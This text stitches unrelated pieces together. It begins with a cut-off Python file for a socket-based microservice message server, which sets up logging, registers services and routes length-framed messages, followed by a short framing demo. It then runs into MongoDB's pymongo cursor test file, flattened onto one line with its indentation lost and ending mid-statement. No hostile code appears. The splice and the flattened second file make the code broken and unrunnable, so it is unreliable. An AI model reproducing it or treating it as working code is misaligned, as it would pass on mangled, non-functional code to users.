    mode='a',
    maxBytes=3*1024*1024,
    backupCount=1,
    encoding="utf-8",
    delay=0
)
r_file_handler_debug.setLevel(logging.DEBUG)

r_file_handler_all_warn = logging.handlers.RotatingFileHandler(
    filename=logs_directory + 'all_warn.log',
    mode='a',
    maxBytes=4*1024*1024,
    backupCount=1,
    encoding="utf-8",
    delay=0
)
r_file_handler_all_warn.setLevel(logging.WARNING)

socket_handler = logging.handlers.SocketHandler("localhost", 5060)
socket_handler.setLevel(logging.WARNING)

#a "print" handler
stdout_handler = logging.StreamHandler(sys.stdout)

formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
r_file_handler_debug.setFormatter(formatter)
r_file_handler_info.setFormatter(formatter)
r_file_handler_all_warn.setFormatter(formatter)
stdout_handler.setFormatter(formatter)
socket_handler.setFormatter(formatter)


def init_a_new_logger(name, lvl=logging.DEBUG):
    #init the logger
    logger = logging.getLogger(name)
    logger.setLevel(lvl)
    #linking the handlers
    logger.addHandler(r_file_handler_info)
    logger.addHandler(r_file_handler_debug)
    logger.addHandler(r_file_handler_all_warn)
    logger.addHandler(socket_handler)
    #adding a "print" handler
    logger.addHandler(stdout_handler)
    return logger


"""class CallableMicroServices:
    def __init__(self):
        self.dict = {}
        self.microservices_types = ("discord_bot", "hypixel_api_analysis")

    def get_microservice(self, microservice_name):
        if microservice_name in self.dict:
            return self.dict[microservice_name]
        else:
            return None #can be considered as False in the future

    def add_microservice(self, microservice_name, microservice_obj):
        if microservice_name in self.microservices_types: #will also overwrite the existing microservice with the same name
            self.dict[microservice_name] = microservice_obj
            return True
        else:
            logger.error("CallableMicroServices -> add_microservices : not in the microservices_types list")
            return False

    def destroy_microservice(self, microservice_obj):
        key_to_destroy = None
        for key, value in self.dict.items():
            if value == microservice_obj:
                key_to_destroy = key
        if key_to_destroy is not None:
            self.dict.pop(key_to_destroy)"""


logger = init_a_new_logger("Global MMS")


class Microservice:
    microservices_dict = {}
    microservices_types = ("discord_bot", "hypixel_api_analysis")

    @classmethod
    def get_microservice(cls, microservice_name):
        if microservice_name in cls.microservices_dict:
            return cls.microservices_dict[microservice_name]
        else:
            return None #can be considered as False in the future

    @classmethod
    def add_microservice(cls, microservice_name, send_socket=None):
        if microservice_name in cls.microservices_types: #will also overwrite an existing microservice with the same name
            microservice = cls.get_microservice(microservice_name)
            if microservice is None:
                microservice = Microservice(microservice_name, send_socket)
            if send_socket is not None:
                microservice.change_socket(send_socket)
            microservice.alive = True
            return microservice
        else:
            logger.error("Microservice -> add_microservice : not in the microservices_types list")
            return None

    @classmethod
    def set_microservice_in_dict(cls, key, value):
        cls.microservices_dict[key] = value

    @classmethod
    def destroy_microservice(cls, microservice_obj):
        microservice_obj.close_socket()
        key_to_destroy = None
        for key, value in cls.microservices_dict.items():
            if value == microservice_obj:
                key_to_destroy = key
        if key_to_destroy is not None:
            cls.microservices_dict.pop(key_to_destroy)

    def __init__(self, name, send_socket=None):
        logger.info(f"Initializing {name} microservice")
        self.last_listening_connexion_etablished = time.time()
        self.name = name
        self.alive = True
        self.is_sending = False #whether the socket is currently in use
        self.send_socket = send_socket
        existing_microservice = self.get_microservice(name)
        if existing_microservice is not None: #an existing microservice object is registered under this name, overwrite it
            del(existing_microservice)
        self.set_microservice_in_dict(name, self)

    def destroy(self):
        self.destroy_microservice(self)
        self.alive = False

    def close_socket(self, socket_to_close="self"):
        if socket_to_close == "self":
            socket_to_close = self.send_socket
        if self.send_socket is socket_to_close:
            try:
                socket_to_close.send(str(len("CLOSE".encode(FORMAT))).encode(FORMAT))
                socket_to_close.send("CLOSE".encode(FORMAT))
            except:
                logger.info("failed to send the CLOSE state")
            if self.send_socket is not None:
                self.send_socket.close()
                self.send_socket = None
        del(socket_to_close)

    def change_socket(self, send_socket):
        if self.send_socket is not None: #overwrite
            self.send_socket.close()
        self.send_socket = send_socket
        self.is_sending = False

    """def add_communication(self, communication):
        if communication not in self.communications:
            self.communications.append(communication)"""

    def ask_alive(self):
        content = "alive {}"
        self.is_sending = True
        self.send_socket.send(str(len(content)).encode(FORMAT))
        resp = self.send_socket.recv(HEADER) #wait for the client to receive the request length
        self.send_socket.send(content.encode(FORMAT))
        self.is_sending = False
        if not resp:
            self.alive = False
        else:
            self.alive = True
        return self.alive

    def send(self, content: str):
        if self.alive is False and self.ask_alive() == False:
            logger.warning("tried to send to a dead microservice, sending cancelled")
            return
        while self.is_sending:
            logger.warning(f"waiting for the socket to stop sending, for {self.name}")
            time.sleep(0.01)
        content = content.encode(FORMAT)
        self.is_sending = True
        self.send_socket.send(str(len(content)).encode(FORMAT))
        self.send_socket.recv(HEADER) #wait for the client to receive the request length
        self.send_socket.send(content)
        self.is_sending = False


class Request: #single request
    def __init__(self, microservice_src: Microservice, microservice_dest: Microservice, data):
        self.microservice_src = microservice_src
        self.microservice_dest = microservice_dest
        self.data = data

    def get_src(self):
        if self.microservice_src.alive:
            return self.microservice_src
        else:
            return False

    def get_dest(self):
        if self.microservice_dest.alive:
            return self.microservice_dest
        else:
            return False


class Communication:
    last_id = -1
    id_to_communication_object = []

    @classmethod
    def new_id_and_add_to_list(cls, obj):
        new_id = cls.last_id + 1
        cls.last_id = new_id
        cls.id_to_communication_object.append(obj)
        return new_id

    def __init__(self, first_request=None):
        self.requests = []
        if first_request is not None:
            self.requests = [first_request]
        self.id = self.new_id_and_add_to_list(self)

    def add(self, request: Request):
        self.requests.append(request)

    def last_speaker(self):
        if len(self.requests) > 0:
            return self.requests[-1].get_src()
        return None


server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT_SERV))
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.bind((HOST, PORT_CLIENT))


def handle_server(conn, addr): #for client mode, when the other side mostly receives and we mostly send
    name = conn.recv(128).decode(FORMAT)
    microservice_obj = Microservice.get_microservice(name)
    if microservice_obj is None:
        conn.send("*BAD_NAME_OR_NOT_INITIALIZED".encode(FORMAT))
        logger.error(f"client mode bad name or not initialized : {name}")
    else:
        #set this socket for commands to this microservice
        microservice_obj.close_socket()
        microservice_obj.change_socket(conn)
        #Confirm the initialization
        conn.send(name.encode(FORMAT))
        microservice_obj.alive = True
        logger.info(f"{microservice_obj.name} CLIENTmode initialized")


def handle_client(conn, addr): #must send its microservice type
    name = conn.recv(128).decode(FORMAT)
    microservice_obj = Microservice.add_microservice(name)
    if microservice_obj is None:
        conn.send("*BAD_NAME".encode(FORMAT))
        logger.error(f"Init bad name : {name}")
        return
    etablished_time = time.time()
    microservice_obj.last_listening_connexion_etablished = etablished_time #used to detect a dead destination
    #Confirm the initialization
    conn.send(name.encode(FORMAT))
    logger.info(f"{microservice_obj.name} SERVERmode initialized")
    while True:
        try:
            msg_length = conn.recv(HEADER)
            microservice_obj.alive = True
        except:
            break
        msg_length = msg_length.decode(FORMAT)
        if msg_length: #handle None received
            msg_length = int(msg_length)
            print("received size", msg_length)
            conn.send(str(msg_length).encode(FORMAT)) #avoid receiving the request length and the content at the same time
            msg = conn.recv(msg_length).decode(FORMAT)
            print(f"received {msg}")
            msg_splitted = msg.split(" ")
            if msg[0] == "!": #main server commands
                if msg == "!DISCONNECT":
                    logger.info("Disconnected by client")
                    microservice_obj.destroy()
                    break
                else:
                    conn.send("*BAD_SERVER_COMMAND".encode(FORMAT))
                    logger.warning(f"bad server command : {msg} from {name}")
            elif msg[0] == ">" or msg[0] == "$":
                dest = Microservice.get_microservice(msg_splitted[0][1:])
                verification_code = None
                if dest is None:
                    verification_code = "*BAD_DEST_NAME".encode(FORMAT)
                    logger.error(f"Bad destination name : {msg_splitted[0][1:]} from {name}")
                elif dest.alive is False:
                    verification_code = "*DIED_DEST".encode(FORMAT)
                    logger.warning(f"Dead dest : {msg_splitted[0][1:]} asked from {name}")
                elif dest.send_socket is None:
                    verification_code = "*NO_SOCKET_DEST".encode(FORMAT)
                    logger.warning(f"No socket dest : {msg_splitted[0][1:]} asked from {name}")
                else:
                    data = msg[0] + msg_splitted[1] + " " + name + " " + msg[len(msg_splitted[0]) + len(msg_splitted[1]) + 2:]
                    #cur_request = Request(microservice_obj, dest, data)
                    #send the request
                    try:
                        dest.send(data)
                    except:
                        verification_code = "*DEST_SOCKET_WORKING_ERR".encode(FORMAT)
                        logger.warning(f"Error when sending data (socket closed ?) to : {msg_splitted[0][1:]} asked from {name}\n{data}")
                if verification_code is None: #no error above
                    verification_code = f"V{msg_length}".encode(FORMAT)
                verification_length = str(len(verification_code)).encode(FORMAT)
                conn.send(verification_length)
                conn.recv(HEADER) #avoid sending the verification length and code at the same time
                conn.send(verification_code)
            else:
                conn.send("*BAD_PREFIX".encode(FORMAT))
                logger.warning(f"no correct prefix specified : {msg} from {name}")
        else:
            logger.info("None received, closing servermode loop")
            break
    logger.info(f"microservice {name}'s request port (our SERVERmode) disconnected")
    if microservice_obj.last_listening_connexion_etablished == etablished_time:
        logger.warning(f"Marking microservice {name} as dead")
        microservice_obj.alive = False #if no newer handle_client connection exists


def start_servermode():
    server.listen()
    logger.info("server is listening...")
    while True:
        conn, addr = server.accept()
        thread = threading.Thread(target=handle_client, args=(conn, addr))
        thread.start()
        logger.debug("new servermode connection started")


def start_clientmode():
    client.listen()
    logger.info("client is listening...")
    while True:
        conn, addr = client.accept()
        thread = threading.Thread(target=handle_server, args=(conn, addr))
        thread.start()
        logger.debug("new clientmode connection started")


logger.warning("Started main microservice server")
thread_servermode = threading.Thread(target=start_servermode)
thread_servermode.start()
start_clientmode()
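Since the framing convention is spread across Microservice.send and handle_client, here is a minimal, self-contained sketch of it (send_framed, recv_framed and the socketpair demo are illustrative names, not part of the server): announce the payload length, wait for the peer to echo it back, then send the payload.

import socket
import threading

HEADER = 64
FORMAT = "utf-8"

def send_framed(sock, content: str):
    # Same framing the server above expects: announce the payload length,
    # wait for the peer to echo it back, then send the payload itself.
    payload = content.encode(FORMAT)
    sock.send(str(len(payload)).encode(FORMAT))
    sock.recv(HEADER)  # length acknowledgement from the peer
    sock.send(payload)

def recv_framed(sock) -> str:
    length = int(sock.recv(HEADER).decode(FORMAT))
    sock.send(str(length).encode(FORMAT))  # acknowledge the announced length
    return sock.recv(length).decode(FORMAT)

# Local demo over a socketpair, standing in for a microservice and the server.
a, b = socket.socketpair()
t = threading.Thread(target=send_framed, args=(a, ">discord_bot 0 hello"))
t.start()
print(recv_framed(b))  # prints: >discord_bot 0 hello
t.join()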
test_cursor.py
# Copyright 2009-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test the cursor module.""" import copy import gc import itertools import random import re import sys import time import threading import warnings sys.path[0:0] = [""] from bson import decode_all from bson.code import Code from bson.son import SON from pymongo import (ASCENDING, DESCENDING, ALL, OFF) from pymongo.collation import Collation from pymongo.cursor import Cursor, CursorType from pymongo.errors import (ConfigurationError, ExecutionTimeout, InvalidOperation, OperationFailure) from pymongo.read_concern import ReadConcern from test import (client_context, unittest, IntegrationTest) from test.utils import (EventListener, ignore_deprecations, rs_or_single_client, WhiteListEventListener) class TestCursor(IntegrationTest): def test_deepcopy_cursor_littered_with_regexes(self): cursor = self.db.test.find({ "x": re.compile("^hmmm.*"), "y": [re.compile("^hmm.*")], "z": {"a": [re.compile("^hm.*")]}, re.compile("^key.*"): {"a": [re.compile("^hm.*")]}}) cursor2 = copy.deepcopy(cursor) self.assertEqual(cursor._Cursor__spec, cursor2._Cursor__spec) def test_add_remove_option(self): cursor = self.db.test.find() self.assertEqual(0, cursor._Cursor__query_flags) cursor.add_option(2) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE) self.assertEqual(2, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.add_option(32) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.add_option(128) cursor2 = self.db.test.find( cursor_type=CursorType.TAILABLE_AWAIT).add_option(128) self.assertEqual(162, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertEqual(162, cursor._Cursor__query_flags) cursor.add_option(128) self.assertEqual(162, cursor._Cursor__query_flags) cursor.remove_option(128) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(32) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE) self.assertEqual(2, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertEqual(2, cursor._Cursor__query_flags) cursor.remove_option(32) self.assertEqual(2, cursor._Cursor__query_flags) # Timeout cursor = self.db.test.find(no_cursor_timeout=True) self.assertEqual(16, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(16) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(16) self.assertEqual(0, cursor._Cursor__query_flags) # Tailable / Await data cursor = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor._Cursor__query_flags) cursor2 = 
self.db.test.find().add_option(34) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(32) self.assertEqual(2, cursor._Cursor__query_flags) # Partial cursor = self.db.test.find(allow_partial_results=True) self.assertEqual(128, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(128) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(128) self.assertEqual(0, cursor._Cursor__query_flags) def test_add_remove_option_exhaust(self): # Exhaust - which mongos doesn't support if client_context.is_mongos: with self.assertRaises(InvalidOperation): self.db.test.find(cursor_type=CursorType.EXHAUST) else: cursor = self.db.test.find(cursor_type=CursorType.EXHAUST) self.assertEqual(64, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(64) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertTrue(cursor._Cursor__exhaust) cursor.remove_option(64) self.assertEqual(0, cursor._Cursor__query_flags) self.assertFalse(cursor._Cursor__exhaust) def test_allow_disk_use(self): db = self.db db.pymongo_test.drop() coll = db.pymongo_test self.assertRaises(TypeError, coll.find().allow_disk_use, 'baz') cursor = coll.find().allow_disk_use(True) self.assertEqual(True, cursor._Cursor__allow_disk_use) cursor = coll.find().allow_disk_use(False) self.assertEqual(False, cursor._Cursor__allow_disk_use) def test_max_time_ms(self): db = self.db db.pymongo_test.drop() coll = db.pymongo_test self.assertRaises(TypeError, coll.find().max_time_ms, 'foo') coll.insert_one({"amalia": 1}) coll.insert_one({"amalia": 2}) coll.find().max_time_ms(None) coll.find().max_time_ms(1) cursor = coll.find().max_time_ms(999) self.assertEqual(999, cursor._Cursor__max_time_ms) cursor = coll.find().max_time_ms(10).max_time_ms(1000) self.assertEqual(1000, cursor._Cursor__max_time_ms) cursor = coll.find().max_time_ms(999) c2 = cursor.clone() self.assertEqual(999, c2._Cursor__max_time_ms) self.assertTrue("$maxTimeMS" in cursor._Cursor__query_spec()) self.assertTrue("$maxTimeMS" in c2._Cursor__query_spec()) self.assertTrue(coll.find_one(max_time_ms=1000)) client = self.client if (not client_context.is_mongos and client_context.test_commands_enabled): # Cursor parses server timeout error in response to initial query. 
client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="alwaysOn") try: cursor = coll.find().max_time_ms(1) try: next(cursor) except ExecutionTimeout: pass else: self.fail("ExecutionTimeout not raised") self.assertRaises(ExecutionTimeout, coll.find_one, max_time_ms=1) finally: client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="off") @client_context.require_version_min(3, 1, 9, -1) def test_max_await_time_ms(self): db = self.db db.pymongo_test.drop() coll = db.create_collection("pymongo_test", capped=True, size=4096) self.assertRaises(TypeError, coll.find().max_await_time_ms, 'foo') coll.insert_one({"amalia": 1}) coll.insert_one({"amalia": 2}) coll.find().max_await_time_ms(None) coll.find().max_await_time_ms(1) # When cursor is not tailable_await cursor = coll.find() self.assertEqual(None, cursor._Cursor__max_await_time_ms) cursor = coll.find().max_await_time_ms(99) self.assertEqual(None, cursor._Cursor__max_await_time_ms) # If cursor is tailable_await and timeout is unset cursor = coll.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(None, cursor._Cursor__max_await_time_ms) # If cursor is tailable_await and timeout is set cursor = coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99) self.assertEqual(99, cursor._Cursor__max_await_time_ms) cursor = coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms( 10).max_await_time_ms(90) self.assertEqual(90, cursor._Cursor__max_await_time_ms) listener = WhiteListEventListener('find', 'getMore') coll = rs_or_single_client( event_listeners=[listener])[self.db.name].pymongo_test results = listener.results # Tailable_await defaults. list(coll.find(cursor_type=CursorType.TAILABLE_AWAIT)) # find self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Tailable_await with max_await_time_ms set. 
list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertTrue('maxTimeMS' in results['started'][1].command) self.assertEqual(99, results['started'][1].command['maxTimeMS']) results.clear() # Tailable_await with max_time_ms list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Tailable_await with both max_time_ms and max_await_time_ms list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms( 99).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertTrue('maxTimeMS' in results['started'][1].command) self.assertEqual(99, results['started'][1].command['maxTimeMS']) results.clear() # Non tailable_await with max_await_time_ms list(coll.find(batch_size=1).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Non tailable_await with max_time_ms list(coll.find(batch_size=1).max_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) # Non tailable_await with both max_time_ms and max_await_time_ms list(coll.find(batch_size=1).max_time_ms(99).max_await_time_ms(88)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) @client_context.require_test_commands @client_context.require_no_mongos def test_max_time_ms_getmore(self): # Test that Cursor handles server timeout error in response to getmore. coll = self.db.pymongo_test coll.insert_many([{} for _ in range(200)]) cursor = coll.find().max_time_ms(100) # Send initial query before turning on failpoint. next(cursor) self.client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="alwaysOn") try: try: # Iterate up to first getmore. 
list(cursor) except ExecutionTimeout: pass else: self.fail("ExecutionTimeout not raised") finally: self.client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="off") def test_explain(self): a = self.db.test.find() a.explain() for _ in a: break b = a.explain() # "cursor" pre MongoDB 2.7.6, "executionStats" post self.assertTrue("cursor" in b or "executionStats" in b) def test_explain_with_read_concern(self): # Do not add readConcern level to explain. listener = WhiteListEventListener("explain") client = rs_or_single_client(event_listeners=[listener]) self.addCleanup(client.close) coll = client.pymongo_test.test.with_options( read_concern=ReadConcern(level="local")) self.assertTrue(coll.find().explain()) started = listener.results['started'] self.assertEqual(len(started), 1) self.assertNotIn("readConcern", started[0].command) def test_hint(self): db = self.db self.assertRaises(TypeError, db.test.find().hint, 5.5) db.test.drop() db.test.insert_many([{"num": i, "foo": i} for i in range(100)]) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("num", ASCENDING)]).explain) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("foo", ASCENDING)]).explain) spec = [("num", DESCENDING)] index = db.test.create_index(spec) first = next(db.test.find()) self.assertEqual(0, first.get('num')) first = next(db.test.find().hint(spec)) self.assertEqual(99, first.get('num')) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("foo", ASCENDING)]).explain) a = db.test.find({"num": 17}) a.hint(spec) for _ in a: break self.assertRaises(InvalidOperation, a.hint, spec) def test_hint_by_name(self): db = self.db db.test.drop() db.test.insert_many([{"i": i} for i in range(100)]) db.test.create_index([('i', DESCENDING)], name='fooindex') first = next(db.test.find()) self.assertEqual(0, first.get('i')) first = next(db.test.find().hint('fooindex')) self.assertEqual(99, first.get('i')) def test_limit(self): db = self.db self.assertRaises(TypeError, db.test.find().limit, None) self.assertRaises(TypeError, db.test.find().limit, "hello") self.assertRaises(TypeError, db.test.find().limit, 5.5) self.assertTrue(db.test.find().limit(5)) db.test.drop() db.test.insert_many([{"x": i} for i in range(100)]) count = 0 for _ in db.test.find(): count += 1 self.assertEqual(count, 100) count = 0 for _ in db.test.find().limit(20): count += 1 self.assertEqual(count, 20) count = 0 for _ in db.test.find().limit(99): count += 1 self.assertEqual(count, 99) count = 0 for _ in db.test.find().limit(1): count += 1 self.assertEqual(count, 1) count = 0 for _ in db.test.find().limit(0): count += 1 self.assertEqual(count, 100) count = 0 for _ in db.test.find().limit(0).limit(50).limit(10): count += 1 self.assertEqual(count, 10) a = db.test.find() a.limit(10) for _ in a: break self.assertRaises(InvalidOperation, a.limit, 5) @ignore_deprecations # Ignore max without hint. def test_max(self): db = self.db db.test.drop() j_index = [("j", ASCENDING)] db.test.create_index(j_index) db.test.insert_many([{"j": j, "k": j} for j in range(10)]) def find(max_spec, expected_index): cursor = db.test.find().max(max_spec) if client_context.requires_hint_with_min_max_queries: cursor = cursor.hint(expected_index) return cursor cursor = find([("j", 3)], j_index) self.assertEqual(len(list(cursor)), 3) # Tuple. cursor = find((("j", 3),), j_index) self.assertEqual(len(list(cursor)), 3) # Compound index. 
index_keys = [("j", ASCENDING), ("k", ASCENDING)] db.test.create_index(index_keys) cursor = find([("j", 3), ("k", 3)], index_keys) self.assertEqual(len(list(cursor)), 3) # Wrong order. cursor = find([("k", 3), ("j", 3)], index_keys) self.assertRaises(OperationFailure, list, cursor) # No such index. cursor = find([("k", 3)], "k") self.assertRaises(OperationFailure, list, cursor) self.assertRaises(TypeError, db.test.find().max, 10) self.assertRaises(TypeError, db.test.find().max, {"j": 10}) @ignore_deprecations # Ignore min without hint. def test_min(self): db = self.db db.test.drop() j_index = [("j", ASCENDING)] db.test.create_index(j_index) db.test.insert_many([{"j": j, "k": j} for j in range(10)]) def find(min_spec, expected_index): cursor = db.test.find().min(min_spec) if client_context.requires_hint_with_min_max_queries: cursor = cursor.hint(expected_index) return cursor cursor = find([("j", 3)], j_index) self.assertEqual(len(list(cursor)), 7) # Tuple. cursor = find((("j", 3),), j_index) self.assertEqual(len(list(cursor)), 7) # Compound index. index_keys = [("j", ASCENDING), ("k", ASCENDING)] db.test.create_index(index_keys) cursor = find([("j", 3), ("k", 3)], index_keys) self.assertEqual(len(list(cursor)), 7) # Wrong order. cursor = find([("k", 3), ("j", 3)], index_keys) self.assertRaises(OperationFailure, list, cursor) # No such index. cursor = find([("k", 3)], "k") self.assertRaises(OperationFailure, list, cursor) self.assertRaises(TypeError, db.test.find().min, 10) self.assertRaises(TypeError, db.test.find().min, {"j": 10}) @client_context.require_version_max(4, 1, -1) def test_min_max_without_hint(self): coll = self.db.test j_index = [("j", ASCENDING)] coll.create_index(j_index) with warnings.catch_warnings(record=True) as warns: warnings.simplefilter("default", DeprecationWarning) list(coll.find().min([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) # Ensure the warning is raised with the proper stack level. 
del warns[:] list(coll.find().min([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) del warns[:] list(coll.find().max([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) def test_batch_size(self): db = self.db db.test.drop() db.test.insert_many([{"x": x} for x in range(200)]) self.assertRaises(TypeError, db.test.find().batch_size, None) self.assertRaises(TypeError, db.test.find().batch_size, "hello") self.assertRaises(TypeError, db.test.find().batch_size, 5.5) self.assertRaises(ValueError, db.test.find().batch_size, -1) self.assertTrue(db.test.find().batch_size(5)) a = db.test.find() for _ in a: break self.assertRaises(InvalidOperation, a.batch_size, 5) def cursor_count(cursor, expected_count): count = 0 for _ in cursor: count += 1 self.assertEqual(expected_count, count) cursor_count(db.test.find().batch_size(0), 200) cursor_count(db.test.find().batch_size(1), 200) cursor_count(db.test.find().batch_size(2), 200) cursor_count(db.test.find().batch_size(5), 200) cursor_count(db.test.find().batch_size(100), 200) cursor_count(db.test.find().batch_size(500), 200) cursor_count(db.test.find().batch_size(0).limit(1), 1) cursor_count(db.test.find().batch_size(1).limit(1), 1) cursor_count(db.test.find().batch_size(2).limit(1), 1) cursor_count(db.test.find().batch_size(5).limit(1), 1) cursor_count(db.test.find().batch_size(100).limit(1), 1) cursor_count(db.test.find().batch_size(500).limit(1), 1) cursor_count(db.test.find().batch_size(0).limit(10), 10) cursor_count(db.test.find().batch_size(1).limit(10), 10) cursor_count(db.test.find().batch_size(2).limit(10), 10) cursor_count(db.test.find().batch_size(5).limit(10), 10) cursor_count(db.test.find().batch_size(100).limit(10), 10) cursor_count(db.test.find().batch_size(500).limit(10), 10) cur = db.test.find().batch_size(1) next(cur) if client_context.version.at_least(3, 1, 9): # find command batchSize should be 1 self.assertEqual(0, len(cur._Cursor__data)) else: # OP_QUERY ntoreturn should be 2 self.assertEqual(1, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) def test_limit_and_batch_size(self): db = self.db db.test.drop() db.test.insert_many([{"x": x} for x in range(500)]) curs = db.test.find().limit(0).batch_size(10) next(curs) self.assertEqual(10, curs._Cursor__retrieved) curs = db.test.find(limit=0, batch_size=10) next(curs) self.assertEqual(10, curs._Cursor__retrieved) curs = db.test.find().limit(-2).batch_size(0) next(curs) self.assertEqual(2, curs._Cursor__retrieved) curs = db.test.find(limit=-2, batch_size=0) next(curs) self.assertEqual(2, curs._Cursor__retrieved) curs = db.test.find().limit(-4).batch_size(5) next(curs) self.assertEqual(4, curs._Cursor__retrieved) curs = db.test.find(limit=-4, batch_size=5) next(curs) self.assertEqual(4, curs._Cursor__retrieved) curs = db.test.find().limit(50).batch_size(500) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find(limit=50, batch_size=500) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find().batch_size(500) next(curs) self.assertEqual(500, curs._Cursor__retrieved) curs = db.test.find(batch_size=500) next(curs) self.assertEqual(500, curs._Cursor__retrieved) curs = db.test.find().limit(50) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find(limit=50) next(curs) self.assertEqual(50, curs._Cursor__retrieved) # these two might be shaky, as the 
default # is set by the server. as of 2.0.0-rc0, 101 # or 1MB (whichever is smaller) is default # for queries without ntoreturn curs = db.test.find() next(curs) self.assertEqual(101, curs._Cursor__retrieved) curs = db.test.find().limit(0).batch_size(0) next(curs) self.assertEqual(101, curs._Cursor__retrieved) curs = db.test.find(limit=0, batch_size=0) next(curs) self.assertEqual(101, curs._Cursor__retrieved) def test_skip(self): db = self.db self.assertRaises(TypeError, db.test.find().skip, None) self.assertRaises(TypeError, db.test.find().skip, "hello") self.assertRaises(TypeError, db.test.find().skip, 5.5) self.assertRaises(ValueError, db.test.find().skip, -5) self.assertTrue(db.test.find().skip(5)) db.drop_collection("test") db.test.insert_many([{"x": i} for i in range(100)]) for i in db.test.find(): self.assertEqual(i["x"], 0) break for i in db.test.find().skip(20): self.assertEqual(i["x"], 20) break for i in db.test.find().skip(99): self.assertEqual(i["x"], 99) break for i in db.test.find().skip(1): self.assertEqual(i["x"], 1) break for i in db.test.find().skip(0): self.assertEqual(i["x"], 0) break for i in db.test.find().skip(0).skip(50).skip(10): self.assertEqual(i["x"], 10) break for i in db.test.find().skip(1000): self.fail() a = db.test.find() a.skip(10) for _ in a: break self.assertRaises(InvalidOperation, a.skip, 5) def test_sort(self): db = self.db self.assertRaises(TypeError, db.test.find().sort, 5) self.assertRaises(ValueError, db.test.find().sort, []) self.assertRaises(TypeError, db.test.find().sort, [], ASCENDING) self.assertRaises(TypeError, db.test.find().sort, [("hello", DESCENDING)], DESCENDING) db.test.drop() unsort = 